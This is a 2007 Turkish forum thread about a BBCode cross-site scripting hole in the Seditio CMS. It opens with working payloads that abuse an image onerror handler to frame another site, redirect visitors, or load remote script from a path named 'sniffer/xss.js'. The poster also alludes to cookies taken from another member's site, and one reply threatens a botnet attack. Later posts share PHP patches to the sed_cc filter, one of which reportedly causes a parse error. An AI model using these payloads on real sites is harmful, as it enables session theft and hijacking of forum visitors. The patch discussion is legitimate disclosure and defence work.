Seditio ve Ldu hakkında sınırsız arama yapın
 
 
Next page > 1 < [2] [3]

Etiketler: bbcode açığı

Author Message

yasebo

Members


Online status

4 posts

Location: Turkey
Occupation:
Age:

#7004   2007-10-08 11:12 GMT      

Selamlar..
yeni bir açık tespit edildi.

Code:
[t=f.jpg[img]onerror=document.write('<frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0><frame frameborder=0 src=http://www.jawnax.net></frameset>') x=document.jpg[/img]x.jpg]x[img] x=document.jpg[/img]ss.jpg[/t]


bu kod çalışır durumda, ama ascii ile encode yapılırsa,

Siz kodu düzenlemek istediğinizde size normal olarak gözükecektir fakat,
forums.php 'de kod çalışır.
işte yukarıdaki kodun ascii şifrelenmiş hali: http://jawnax.net/codexss.txt
bu kod ile neler yapılabilir?

bütün html js kodları çalıştırılabilir..
Örneğin;
Code:
[t=f.jpg[img]onerror=document.body.appendChild(document.createElement('script')).src='http://www.jawnax.net/sniffer/xss.js' x=document.jpg[/img]x.jpg]x[img] id=xss x=document.jpg[/img]ss.jpg[/t]


Code:
[t=f.jpg[img]onerror=document.write('<meta http-equiv="Refresh"content="0; URL=http://www.jawnax.net">') x=document.jpg[/img]x.jpg]x[img] x=document.jpg[/img]ss.jpg[/t]



Bu şekilde sınırsız kötü amaçlı kodlar üretilebilir..
dileyen şimdilik resmi bir yama çıkmana kadar bunu kullana bilir »

Functions.php Açın
Bul >
Code:
$bbcodes = array(
'$' => '$',

Kodu alttaki linkten kopyalayın, burda normal gözükür.
Bulunacak kod: http://www.jawnax.net/codefind.txt

Üstüne kaydet >
Code:
$bbcodes = array(
'$' => '$',
'a' => 'Error',
'w' => 'Error',
'd' => 'Error',
'.' => 'Error',

Kod burada harf olarak çıkar, ascii olduğu için dbde gözükür. alltaki linki kullanın.
Üstüne yazacağınız kod: http://jawnax.net/codereplace.txt
Kapatıp kayıt edin.


Yazar: yasebo / www.jawnax.net
Teşekkürler: Chenator-Stalin, KaaN



.

Neo

Members


Online status

3 posts
http://www.hackturkiye.com
Pagerank: 4

Location: Turkey HackTurkiye
Occupation:
Age: 23

#7006   2007-10-08 12:31 GMT      
. . .

This post was edited by Dvdbil (2007-10-08 14:39 GMT, 275 Gün ago)

yasebo

Members


Online status

4 posts

Location: Turkey
Occupation:
Age:

#7007   2007-10-08 12:46 GMT      

biraz terbiyeni takın,

http://yasebo.net/cookie/ekledik.txt

Burda senin sitedende cookie var sildim mesajı, sen hiç birşey bilmediğin için sadece yönlendiriyorsunuz dersin.

anca flood yapmasını bilirsin

This post was edited by Dvdbil (2007-10-08 14:40 GMT, 275 Gün ago)

Neo

Members


Online status

3 posts
http://www.hackturkiye.com
Pagerank: 4

Location: Turkey HackTurkiye
Occupation:
Age: 23

#7008   2007-10-08 12:55 GMT      
cookie alıp ne yapıcaksın sen daha seditio systemini bilmiyosun benim cookie lerim benim ipimle calışır kus ben flood cekmem cekersem botnetle saldırım güzelim : ) bunu aklının bi köşesine sok. eziq olan sizlersiniz o kadar eziqsinizki domain firmasina email cekerek site hackliyosunuz içinizdeki eziqliği böyle tatmin ediyosunuz. ( Senin gibi eziq biriyle polemiğe giremicem istedini yaz. )

yasebo

Members


Online status

4 posts

Location: Turkey
Occupation:
Age:

#7009   2007-10-08 12:58 GMT      
Quote
Neo :
cookie alıp ne yapıcaksın sen daha seditio systemini bilmiyosun benim cookie lerim benim ipimle calışır kus ben flood cekmem cekersem botnetle saldırım güzelim : ) bunu aklının bi köşesine sok. eziq olan sizlersiniz o kadar eziqsinizki domain firmasina email cekerek site hackliyosunuz içinizdeki eziqliği böyle tatmin ediyosunuz. ( Senin gibi eziq biriyle polemiğe giremicem istedini yaz. )



Seninle tartismaya bile girmek istemiyorum seviyem degilsin,
madem kendine o kadar cok guveniyosun, botnetle saldır jawnaX'a neyle saldırıyosan saldır, icraat istiyorum konusmayla olmuyor bu isler

icraat gormek istiyorum

Konuya cevap yazma iyice dagittin.

Xiao

Moderators


Online status

851 posts
http://www.seditione.com
Pagerank: 0

Location: Turkey Trabzon
Occupation: Orman Mühendisi
Age: 30

#7010   2007-10-08 13:31 GMT      
amacınız nedir?kendinizi tatmin etmek mi?ozaman bu siteden uzak dursanız iyi olur!..
Haziran 2008 Seditio Site Yarışması >> http://www.seditione.com

Kral

Members


Online status

87 posts
http://www.sekort.com
Pagerank: 2

Location: Turkey istanbul
Occupation: Securtiy
Age: 23

#7011   2007-10-08 13:40 GMT      
Code:
Fix Solution by Kilandor - http://www.seditioforge.com/

Search for in system/functions.php
function sed_cc

Then Find
$text = str_replace(
array('{', '<', '>' , '$', '\'', '"', '\\', '&amp;', '&nbsp;'),
array('{', '<', '>', '$', ''', '"', '\', '&amp;amp;', '&amp;nbsp;'), $text);

Replace it with
$text = str_replace(
array('{', '<', '>' , '$', '\'', '"', '\\', '&amp;', '&nbsp;', '#'),
array('{', '<', '>', '$', ''', '"', '\', '&amp;amp;', '&amp;nbsp;', 'l'), $text);

You can see the fix working in action here.

http://www.seditioforge.com/tutorials/core-hacks/security-fix---ascii-insertion-into-text-i63.html

Fix Solution by Kilandor - http://www.seditioforge.com/



Açığın Yamasi

zaygo

Members


Online status

22 posts
http://www.trksecurity.net
Pagerank: 0

Location: Germany
Occupation: Seditio Ar-Ge
Age: 21

#7013   2007-10-08 14:05 GMT      
functions.php dosyası 121 de ve 122 beda çeşitli açıklardan yamalanmıs.Seditio122 kurup açığı test ettikden sonra yamaları kurmak daha mantıklı.
Bu açıklanamaz, ama hissedersin. Hayatin boyunca dünyayla ilgili bazı şeylerin yanlış olduğunu hissetmişsindir.. Ne olduğunu bilmezsin, ama o ordadır; beynine saplanmış bir kıymık parçası gibi... Seni deli eder...
Morpheus
"The Matrix"

Xiao

Moderators


Online status

851 posts
http://www.seditione.com
Pagerank: 0

Location: Turkey Trabzon
Occupation: Orman Mühendisi
Age: 30

#7019   2007-10-08 15:05 GMT      

Dvdbil gerekli yamayı yayınladı.lütfen anasayfaya göz atın.
Haziran 2008 Seditio Site Yarışması >> http://www.seditione.com

Dvdbil

Administrator


Online status

2,096 posts
http://www.seditio-tr.com
Pagerank: 3

Location: Turkey istanbul
Occupation: Web Tasarım & Yazılım
Age: 28

#7020   2007-10-08 15:07 GMT      
Açıkçası dün yazacaktım ama bu şekil yamalama pek mantıklı değil.

İlerleyen zamanlarda bazılarının sisteminde sorun çıkacaktır

Xiao

Moderators


Online status

851 posts
http://www.seditione.com
Pagerank: 0

Location: Turkey Trabzon
Occupation: Orman Mühendisi
Age: 30

#7023   2007-10-08 15:29 GMT      
sadece bir # nin bukadar büyük açık yaratmasının sebebi nedir dvdbil?
Haziran 2008 Seditio Site Yarışması >> http://www.seditione.com

Dvdbil

Administrator


Online status

2,096 posts
http://www.seditio-tr.com
Pagerank: 3

Location: Turkey istanbul
Occupation: Web Tasarım & Yazılım
Age: 28

#7028   2007-10-08 16:08 GMT      
Olur böyle şeyler

2002 yılında Yahoo Mail'deki $ açığı ile benzer bir durum.

Kaan

Moderators


Online status

1,926 posts
http://www.ntka.org
Pagerank: 3

Location: Turkey
Occupation: Destek
Age: 25

#7029   2007-10-08 16:42 GMT      

Sorun cıkarıyor (') kullanımına izin vermiyor. Bende Başka türlü yamaladım
Tıkla Anında Sende Kazan!
UIygun Fiyata Seditio Tasarımı Yapılır..
Sitemap Yenilendi

siyah.kin

Members


Online status

98 posts
http://www.miraturk.org
Pagerank: 3

Location: Turkey GiresunYer6
Occupation: Web Tasarım
Age: 22

#7032   2007-10-08 17:22 GMT      
Quote
Neo :
cookie alıp ne yapıcaksın sen daha seditio systemini bilmiyosun benim cookie lerim benim ipimle calışır kus ben flood cekmem cekersem botnetle saldırım güzelim : ) bunu aklının bi köşesine sok. eziq olan sizlersiniz o kadar eziqsinizki domain firmasina email cekerek site hackliyosunuz içinizdeki eziqliği böyle tatmin ediyosunuz. ( Senin gibi eziq biriyle polemiğe giremicem istedini yaz. )





ulan neo ayda yılda bir doğru dürüst laf etmişsin katılıyorum.
Mira Group

Kilandor

Members


Online status

2 posts

Location: United States
Occupation:
Age:

#7035   2007-10-08 17:38 GMT      
Updated to fix the ' Problem'

http://www.seditioforge.com/tutorials/core-hacks/security-fix---ascii-insertion-into-text-i63.html

Code:
Fix Solution by Kilandor - http://www.seditioforge.com/

Updated Replace With Step.

# must be filtered First before all others for for example.

( would normally parse {
With # last, { would become &#123;

Search for in system/functions.php
function sed_cc

Then Find
$text = str_replace(
array('{', '<', '>' , '$', '\'', '"', '\\', '&amp;', '&nbsp;'),
array('{', '<', '>', '$', ''', '"', '\', '&amp;amp;', '&amp;nbsp;'), $text);

~~Updated~~ Replace it with
$text = str_replace(
array('#', '{', '<', '>' , '$', '\'', '"', '\\', '&amp;', '&nbsp;'),
array('#', '{', '<', '>', '$', ''', '"', '\', '&amp;amp;', '&amp;nbsp;'), $text);

You can see the fix working in action here.

http://www.seditioforge.com/tutorials/core-hacks/security-fix---ascii-insertion-into-text-i63.html

Fix Solution by Kilandor - http://www.seditioforge.com/

emremix

Moderators


Online status

437 posts

Location: Turkey
Occupation: emremix
Age:

#7037   2007-10-08 19:38 GMT      
Code:
[t=thumbnail][/t]


Bbcode sini funktions.php ve textboxerdan kaldırsam açık kapanır mı ?
Yoksa illa yamayı yapayım mı ? acil cevap bekliyorum

zaygo

Members


Online status

22 posts
http://www.trksecurity.net
Pagerank: 0

Location: Germany
Occupation: Seditio Ar-Ge
Age: 21

#7038   2007-10-08 19:54 GMT      
ben kendi siteme şahsen bu yamayı kurmadım.Kendi aldığım önlemler ve sed122 beta kurulu.Daha hiç bişi olmadı.Sürekli kontrol ediyorum.
Bu açıklanamaz, ama hissedersin. Hayatin boyunca dünyayla ilgili bazı şeylerin yanlış olduğunu hissetmişsindir.. Ne olduğunu bilmezsin, ama o ordadır; beynine saplanmış bir kıymık parçası gibi... Seni deli eder...
Morpheus
"The Matrix"

Dvdbil

Administrator


Online status

2,096 posts
http://www.seditio-tr.com
Pagerank: 3

Location: Turkey istanbul
Occupation: Web Tasarım & Yazılım
Age: 28

#7040   2007-10-08 20:08 GMT      
Arkadaşlar yayınlanan v122 beta`dır. Yani sadece test sürümüdür.. Dolayısıyla her hata için yeni bir konu açarak belirtin veya neocrome.net'ten bugtracker listesine ekleyiniz.

emremix

Moderators


Online status

437 posts

Location: Turkey
Occupation: emremix
Age:

#7041   2007-10-08 20:10 GMT      

bide ilk sorumu cevaplayabilir misin ?

adense

Members


Online status

51 posts

Location: Turkey
Occupation:
Age:

#7042   2007-10-08 20:10 GMT      
yukarıdaki yamaları uygulayınca site hata veriyor
Code:
Parse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' /usr/hosts/domains/domainadı/www.siteadi.biz/httpdocs/system/functions.php on
line 1274
Next page > 1 < [2] [3]

Benzer konular (Similar topics) #BETA

Keywords (beta):

Forum Arşiv (beta):

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] [31] [32] [33] [34] [35] [36] [37] [38] [39] [40] [41] [42] [43] [44] [45] [46] [47] [48] [49] [50] [51] [52] [53] [54] [55] [56] [57] [58] [59] [60] [61] [62] [63] [64] [65] [66] [67] [68] [69] [70] [71] [72] [73] [74] [75] [76] [77] [78] [79] [80] [81] [82] [83] [84] [85] [86] [87] [88] [89] [90] [91] [92] [93] [94] [95] [96] [97] [98] [99] [100] [101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120] [121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140] [141] [142] [143] [144] [145] [146] [147] [148] [149] [150] [151] [152] [153] [154] [155] [156] [157] [158] [159] [160] [161] [162] [163] [164] [165] [166] [167] [168] [169] [170] [171] [172] [173] [174] [175] [176] [177] [178] [179] [180] [181] [182] [183] [184] [185] [186] [187] [188] [189] [190] [191] [192] [193] [194] [195] [196] [197] [198] [199] [200] [201] [202] [203] [204] [205] [206] [207] [208] [209] [210] [211] [212] [213] [214] [215] [216] [217] [218] [219] [220] [221] [222] [223] [224] [225] [226] [227] [228] [229] [230] [231] [232] [233] [234] [235] [236] [237] [238] [239] [240] [241] [242] [243] [244] [245] [246] [247] [248] [249] [250] [251] [252] [253] [254] [255] [256] [257] [258] [259] [260] [261] [262] [263] [264] [265] [266] [267] [268] [269] [270] [271] [272] [273] [274] [275] [276] [277] [278] [279] [280] [281] [282] [283] [284] [285] [286] [287] [288] [289] [290] [291] [292] [293] [294] [295] [296] [297] [298] [299] [300] [301] [302] [303] [304] [305] [306] [307] [308] [309] [310] [311] [312] [313] [314] [315] [316] [317] [318] [319] [320] [321] [322] [323] [324] [325] [326] [327] [328] [329] [330] [331] [332] [333] [334]